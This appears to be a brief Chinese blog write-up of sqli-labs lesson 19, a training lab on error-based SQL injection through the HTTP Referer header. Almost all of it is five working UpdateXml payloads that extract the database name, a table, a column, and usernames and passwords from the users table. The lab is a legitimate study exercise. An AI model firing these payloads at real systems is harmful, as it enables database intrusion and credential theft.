【sqli-labs】 less19 POST - Header Injection - Referer field - Error based (基於頭部的Referer POST報錯註入)
阿新 • • 發佈:2018-01-26
span word form where sch select 技術 分享 less
這個和less18一樣,都是基於header的註入
這次的字段是referer
Referer: 123‘ AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1)#
Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),0x7e),1),1)#
Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 0,1),0x7e),1),1)#
Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1),1)#
Referer: 123‘ AND UpdateXml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),1),1)#
【sqli-labs】 less19 POST - Header Injection - Referer field - Error based (基於頭部的Referer POST報錯註入)